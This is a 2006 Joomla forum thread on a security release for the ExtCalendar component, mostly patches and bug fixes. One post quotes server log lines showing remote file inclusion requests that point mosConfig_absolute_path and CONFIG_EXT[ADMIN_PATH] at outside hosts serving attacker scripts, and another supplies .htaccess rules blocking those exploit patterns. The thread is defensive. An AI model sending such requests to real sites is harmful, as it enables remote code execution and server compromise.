[UPGRADE AVAIL.] ExtCalendar Vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Forum rules
Locked
TCwho
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Fri Sep 09, 2005 8:37 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by TCwho » Sun Aug 13, 2006 1:54 pm

Just want to say a Big

Thank You

I have joomla version 1.0.6 with extCal version 0.9.1 installed and without any changes on our part we got the following error message:

Fatal error: main(): Failed opening required '' (include_path='.:/usr/local/lib/php') in /homepages/34/d113888460/htdocs/ssdc2/administrator/components/com_extcalendar/admin.extcalendar.php on line 13


After apply the uninstall and reinstalling with the 0.9.2 version, calendar was back up.... Hmmm I always liked this calendar since back from Mambo days... now I gotta do some more reading to find some other calendar alternatives...but if it was like the mambo days ...extCalendar was the top choice! and from the looks of it .. Im not the only one who still prefers it

:)

Thanks again.

technopuzzle
Joomla! Ace
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by technopuzzle » Sun Aug 13, 2006 7:43 pm

With all the security issues going around, you may also want to upgrade to Joomla 1.0.10.
TCwho wrote: Just want to say a Big

Thank You

I have joomla version 1.0.6 with extCal version 0.9.1 installed and without any changes on our part we got the following error message:

Fatal error: main(): Failed opening required '' (include_path='.:/usr/local/lib/php') in /homepages/34/d113888460/htdocs/ssdc2/administrator/components/com_extcalendar/admin.extcalendar.php on line 13


After apply the uninstall and reinstalling with the 0.9.2 version, calendar was back up.... Hmmm I always liked this calendar since back from Mambo days... now I gotta do some more reading to find some other calendar alternatives...but if it was like the mambo days ...extCalendar was the top choice! and from the looks of it .. Im not the only one who still prefers it

:)

Thanks again.
Thanks,
Roger Raymond
Techno Puzzle

User avatar
theflyingdutchman
Joomla! Explorer
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by theflyingdutchman » Sun Aug 20, 2006 7:03 pm

LeonZ wrote: Thanks for the hard work.  :D
Little problem, dutch language file included doesn't work at all. Attached a working version for dutch.
after uploading the dutch zip i get the next error

Fatal error: Cannot redeclare translate_deprecated() (previously declared in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php:439) in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php on line 439

do you have any idea?

cheers
Peter
Je moet toch ergens in geloven, ik geloof dat ik nog maar een biertje pak.

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Mon Aug 21, 2006 11:34 am

Peter,

This means the variale translate_deprecated has been declared more than once. You can comment out line 439 in components/com_extcalendar/languages/dutch/index.php.

greetings
Fonny

User avatar
theflyingdutchman
Joomla! Explorer
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by theflyingdutchman » Mon Aug 21, 2006 12:38 pm

fonny wrote: Peter,

This means the variale translate_deprecated has been declared more than once. You can comment out line 439 in components/com_extcalendar/languages/dutch/index.php.

greetings
Fonny
Hi Fonny

You mean just delete it?

cheers
Je moet toch ergens in geloven, ik geloof dat ik nog maar een biertje pak.

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Mon Aug 21, 2006 4:13 pm

Peter,
delete or comment. you choose.

gr

User avatar
theflyingdutchman
Joomla! Explorer
Joomla! Explorer
Posts: 422
Joined: Wed Feb 01, 2006 4:53 pm
Location: 't schone brabant
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by theflyingdutchman » Mon Aug 21, 2006 6:46 pm

fonny wrote: Peter,
delete or comment. you choose.

gr
Parse error: syntax error, unexpected '}' in /***/***/***/***/***/***/components/com_extcalendar/languages/dutch/index.php on line 607

is the next error :(
does that mean i need to comment out the complete part between line 439 and 607?

prob allready been fixed.
just had to 1 character to much commented out
working now

thx again
Last edited by theflyingdutchman on Mon Aug 21, 2006 6:54 pm, edited 1 time in total.
Je moet toch ergens in geloven, ik geloof dat ik nog maar een biertje pak.

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Mon Aug 21, 2006 7:31 pm

Peter,

I just checked the language file and can only find one declaration of translate_deprecated. To comment out just change line 439 from
function translate_DEPRECATED($word){
to
//function translate_DEPRECATED($word){

But I don't think this is the problem. Did you get your version from DutchJoomla ? This is NOT the latest en safe version. Please read this thread http://forum.joomla.org/index.php/topic ... #msg402249
and get this version (dutch language is included).

Fonny

RasCas
Joomla! Apprentice
Joomla! Apprentice
Posts: 10
Joined: Fri Jun 02, 2006 9:59 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by RasCas » Mon Aug 21, 2006 7:53 pm

Ok, and now something completely different  8)
a bug concerning monthly view has survived. if there are more than one events on a day in monthly view all events show the same text..
Fix: in extcalendar.php move line 531 into the while loop

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Mon Aug 21, 2006 8:02 pm

Can we keep on topic and move those questions to the extcalendar tracker ?
This is about the security issues of extcalendar.

Fonny

User avatar
ahwoogamac
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ahwoogamac » Tue Aug 22, 2006 1:46 pm

I have a couple questions.

1) Were the Theme files changed in the security release?  I have spent some considerable time tweaking the theme files (and unfortunately a little of the extcalendar.php file - so it will be overwritten) to actually make the calendar xhtml and css valid.  If the theme files haven't been changed, I'll remove the them from the .zip file before I try any upgrades.

2) Now that ExtCalendar is "resurrected," will it be included again in the Extensions list?
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Wed Aug 23, 2006 3:37 am

default/themes.php was changed, but just a bit, so you'd want to just make the changes to themes.php by hand (make sure you backup your modified themes.php before doing the removal or installation).

This is the key line -

Code: Select all

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
which should be added about line 18 (before any other code).

There were a few other bug fixes (whch you may have already made). The patch from the previous release to the security release is attached.

Yes, it will get back in the extensions directory soon. We've been working on getting the JoomlaForge project setup and I haven't had a chance to add it back to the list.

david
You do not have the required permissions to view the files attached to this post.

User avatar
ahwoogamac
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ahwoogamac » Wed Aug 23, 2006 3:34 pm

Great.  I already did that after the necromancer hacking scare.  So I should be good to go.  There was also a bug in the tables around the search area, where the aren't inserted correctly by the php and the code messes up.  While I would think working to a tabless template would be ideal, inserting an extra couple tags into the theme will correct the problem.  Just FYI.
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

sohoportal
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by sohoportal » Wed Aug 30, 2006 6:16 am

ahwoogamac wrote: Great.  I already did that after the necromancer hacking scare.  So I should be good to go.  There was also a bug in the tables around the search area, where the aren't inserted correctly by the php and the code messes up.  While I would think working to a tabless template would be ideal, inserting an extra couple tags into the theme will correct the problem.  Just FYI.
After spending the past 1.5 hours scouring this site and the Internet in general, I can't seem to find any detailed references which indicate how to deal with the bottom search bar in Ext Calendar re-directing users to the home page. I apologize if this has been posted and I've overlooked it. I would greatly appreciate any help or assistance that can be provided in addressing/correcting this problem.

If this fix is included in the most recent vulnerability fix, I'd appreciate knowing that as well (and thanks very much to the folks that made the vulnerability fix a reality).

User avatar
ahwoogamac
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ahwoogamac » Wed Aug 30, 2006 1:10 pm

After speaking to some that are working on the project, we discussed the search issue.  Along with a BUNCH of other cool stuff, it sounds like they'll be addressing that issue upon the next release.  There was a temporary fix posted in the comment area of the ExtCalendar extension area, but since they removed it as an extension for now, it's no longer available.  I just removed the whole search option alltogether on mine until the fix comes out.  Just go to your settings in the backend admin area and change Enable Search to "no."
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.

sohoportal
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by sohoportal » Wed Aug 30, 2006 2:20 pm

ahwoogamac wrote: After speaking to some that are working on the project, we discussed the search issue.  Along with a BUNCH of other cool stuff, it sounds like they'll be addressing that issue upon the next release.  There was a temporary fix posted in the comment area of the ExtCalendar extension area, but since they removed it as an extension for now, it's no longer available.  I just removed the whole search option alltogether on mine until the fix comes out.  Just go to your settings in the backend admin area and change Enable Search to "no."
Thanks very much for your prompt reply. I have done as suggested and eagerly await the next fix.

na3
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Mon Jul 17, 2006 3:57 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by na3 » Sun Sep 10, 2006 8:35 am

Just wanted to say thanks for the security release. After upgrading my site and using the Events component found on Mamboforge, I found that Events broke. I decided to drop Events and use ExtCal instead - only to find these security problems! So glad Joomla people are willing to muck in on 3rd party stuff, since the ExtCal developer seems to be doing nothing.

:-* 

ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Thu Sep 21, 2006 3:10 am

sohoportal wrote: After spending the past 1.5 hours scouring this site and the Internet in general, I can't seem to find any detailed references which indicate how to deal with the bottom search bar in Ext Calendar re-directing users to the home page. I apologize if this has been posted and I've overlooked it. I would greatly appreciate any help or assistance that can be provided in addressing/correcting this problem.
In the file "/components/com_extcalendar/themes/default/theme.php" search for the following code:

Code: Select all

// HTML template for the search form
$template_search_form = <<<EOT
	<form action="{FORM_ACTION}" method="post">
<!-- BEGIN message_row -->
Replace that block of code with this:

Code: Select all

// HTML template for the search form
$sef_href = sefRelToAbs( $CONFIG_EXT['calendar_calling_page']);
$template_search_form = <<<EOT
	<form action="{$sef_href}" method="post">
<!-- BEGIN message_row -->
Save file, and enjoy.

Darrell
http://www.rocketryplanet.com

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Thu Sep 21, 2006 8:10 am

Darell,

I would rather advice to catch the error at the roots. Problem is $CONFIG_EXT which is not defined as global in function theme_search_form()

Change line 1527 in function theme_search_form($keyword, $button) to

    global $template_search_form, $lang_event_search_data, $CONFIG_EXT;

No need to change anything further.

greetings
fonny

Ottobufonto
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 118
Joined: Tue Sep 06, 2005 10:53 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Ottobufonto » Thu Sep 21, 2006 8:45 am

Hmm,
but Darell is looking at $template_search_form which is used by function theme_search_results ().

To fix the root problem for FORM_ACTION in  $template_search_form you need to add the variable to the correct array in the calling function.

Code: Select all

$params = array(
			'{KEY_VAL}' => $keyword,
			'{KEY_DESC}' => $lang_event_search_data['search_caption'],
			'{SUBMIT}' => $button,
			'{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page']) <----- add this line.
		);
		echo template_eval($search_row, $params);
Btw: Not that his has anything to do with the topic - the Security Release!

User avatar
fonny
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Fri Aug 26, 2005 8:27 am
Location: Westerlo

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by fonny » Thu Sep 21, 2006 9:17 am

Ottobufonto,

Sorry, I didn't know this line was missing in the original file. I must have already patched it 'incorrectly' in the past.

You're right, this has nothing to do with the org topic.

sohoportal
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Tue Jan 17, 2006 9:13 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by sohoportal » Thu Sep 21, 2006 11:41 am

Ottobufonto wrote: Hmm,
but Darell is looking at $template_search_form which is used by function theme_search_results ().

To fix the root problem for FORM_ACTION in  $template_search_form you need to add the variable to the correct array in the calling function.

Code: Select all

$params = array(
			'{KEY_VAL}' => $keyword,
			'{KEY_DESC}' => $lang_event_search_data['search_caption'],
			'{SUBMIT}' => $button,
			'{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page']) <----- add this line.
		);
		echo template_eval($search_row, $params);
Btw: Not that his has anything to do with the topic - the Security Release!
Thanks very much Darrell, Ottobufonto & Fonny.

Garry
Last edited by sohoportal on Thu Sep 21, 2006 11:52 am, edited 1 time in total.

ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Thu Sep 21, 2006 5:20 pm

There is also a problem with the Edit button on popped-up events not having the Itemid on it.  I fixed mine by adding some code to the $non_sef_href:

Code: Select all

$non_sef_href = $CONFIG_EXT['calendar_url']."cal_popup.php?extmode=view&extid=".$event->extid.($event->isRecurrent()?"&recurdate=".$event->recurStartDay:'');
Add Itemid=".$CONFIG_EXT['Itemid']."& to look like:

Code: Select all

$non_sef_href = $CONFIG_EXT['calendar_url']."cal_popup.php?Itemid=".$CONFIG_EXT['Itemid']."&extmode=view&extid=".$event->extid.($event->isRecurrent()?"&recurdate=".$event->recurStartDay:'');
This is in several places.  Just search for "MM_openBrWindow" and you will find it.

pdstein
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by pdstein » Mon Sep 25, 2006 5:35 pm

Have any new vulnerabilities been found in extCal v2 (0.9.2)?  I upgraded extCalendar on July 20 and thought it was secure.  The company that manages my server says that malicious scripts were uploaded onto the server and cited about 40 entries in the logs that look like this

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://mirckurdu.net/sanalofis/lol.txt? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"

plus one like this:

campersforchrist.com:147.202.47.31 - - [25/Sep/2006:07:05:24 -0400] "GET /cms/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nioku.myinfo.ws/cmd.do?? HTTP/1.1" 200 58 "-" "libwww-perl/5.805"

Is there a way to confirm whether this was definitely the way the malicious scripts were uploaded?  Is there a security hole in extCal 0.9.2?  Or could it be something else?  Any help would be greatly appreciated.

- Paul

ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Mon Sep 25, 2006 6:04 pm

pdstein wrote: Have any new vulnerabilities been found in extCal v2 (0.9.2)?  I upgraded extCalendar on July 20 and thought it was secure.
I think you can pretty much say that if you have not updated the software YOURSELF to include the code to check for being run in standalone mode or you have not modified your .htaccess file to block the exploits, that your calendar software is STILL VULNERABLE.

You need to do two things:

In ALL PHP files in the /components/com_extcalendar directory except cal_popup.php, add this line to the beginning of the file right after the comments and version information:

Code: Select all

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Then, at the end of your .htaccess file, add:

Code: Select all

########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# 
########## End - Rewrite rules to block out some common exploits

ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Mon Sep 25, 2006 6:11 pm

sohoportal wrote: Thanks very much Darrell, Ottobufonto & Fonny.
Actuall, Ottobufonto and Fonny were both right.  The modification I did broke the admin side when you went to change/edit the setting in the Administrator.  Just make sure your function theme_search_form looks like this:

Code: Select all

function theme_search_form($keyword, $button)
{
    global $template_search_form, $lang_event_search_data, $CONFIG_EXT; // <-- added $CONFIG_EXT

       starttable('100%', $lang_event_search_data['section_title'], 1);
       $params = array(
          '{KEY_VAL}' => $keyword,
          '{KEY_DESC}' => $lang_event_search_data['search_caption'],
          '{SUBMIT}' => $button,
          '{FORM_ACTION}' => sefRelToAbs( $CONFIG_EXT['calendar_calling_page'] ) // <-- Added this line
       );
       echo template_eval($template_search_form, $params);
       endtable();
}

ssherlock
Joomla! Apprentice
Joomla! Apprentice
Posts: 29
Joined: Wed Oct 05, 2005 9:29 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ssherlock » Mon Sep 25, 2006 6:14 pm

ddmobley wrote: Then, at the end of your .htaccess file, add:

Code: Select all

########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# 
########## End - Rewrite rules to block out some common exploits
I would also get your hosting company to check that what hjas been added to .htaccess is OK.  My host had to enable something their side to make it work correctly.  Sorry, but I don't remember what the changes were.
Last edited by ssherlock on Mon Sep 25, 2006 6:15 pm, edited 1 time in total.

pdstein
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by pdstein » Mon Sep 25, 2006 6:29 pm

ddmobley wrote: In ALL PHP files in the /components/com_extcalendar directory except cal_popup.php, add this line to the beginning of the file right after the comments and version information:

Code: Select all

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
This was already in components/com_extcalendar/extcalendar.php and administrator/components/com_extcalendar/admin_settings.php
Then, at the end of your .htaccess file, add:
Is not having that code in a .htaccess file a genuine security vulnerability, or are just saying it's a good idea to have it because maybe it might prevent some security vulnerability someone discovers in the future.  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerabilty then I need to keep looking.

ddmobley
Joomla! Intern
Joomla! Intern
Posts: 90
Joined: Thu Jun 15, 2006 2:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by ddmobley » Mon Sep 25, 2006 7:03 pm

pdstein wrote:

Code: Select all

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
This was already in components/com_extcalendar/extcalendar.php and administrator/components/com_extcalendar/admin_settings.php
But is it in EVERY PHP file in that directory except the calendar popup file?  That is the only way to prevent those files from being run standalone.
pdstein wrote: Is not having that code in a .htaccess file a genuine security vulnerability, or are just saying it's a good idea to have it because maybe it might prevent some security vulnerability someone discovers in the future.  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerabilty then I need to keep looking.
The contents of that htaccess file are designed to block attempts that exploit the "mosConfig_absolute_path" method.  You had one of those in your log file:

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://********/? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"

Mod Edit: Please do not post links to cracker tools. -RobS
Last edited by RobS on Mon Sep 25, 2006 11:07 pm, edited 1 time in total.

pdstein
Joomla! Apprentice
Joomla! Apprentice
Posts: 18
Joined: Sat Jun 24, 2006 12:18 am

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by pdstein » Mon Sep 25, 2006 7:28 pm

ddmobley wrote: But is it in EVERY PHP file in that directory except the calendar popup file?  That is the only way to prevent those files from being run standalone.
Yes, it is.
pdstein wrote: Is not having that code in a .htaccess file a genuine security vulnerability, or are just saying it's a good idea to have it because maybe it might prevent some security vulnerability someone discovers in the future.  The reason I ask is because I want to know for sure how the malicious scripts got on the server.  If this is not a genuine known vulnerabilty then I need to keep looking.
The contents of that htaccess file are designed to block attempts that exploit the "mosConfig_absolute_path" method.  You had one of those in your log file:

campersforchrist.com:194.216.112.233 - - [25/Sep/2006:03:28:26 -0400] "GET /cms/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://**********? HTTP/1.1" 200 58 "-" "libwww-perl/5.65"
[/quote]

Mod Note: Please do not post links to cracker tools. -RobS

I will go ahead and follow your suggestion and add that code to the .htaccess file.  What I would like to know though is if extCalendar is actually vulnerable without it or this is just a precautionary measure.  If there is a real security vulnerability then there should be a change/patch to the PHP code not just some .htaccess code.  Again, I don't mind adding the .htaccess code just to be safe, but there isn't any known way someone could have exploited extcalendar without the .htaccess code, then I need to know that so I can keep looking for the security vulerability that was exploited.
Last edited by RobS on Mon Sep 25, 2006 11:08 pm, edited 1 time in total.


Locked

Return to “3rd Party/Non Joomla! Security Issues”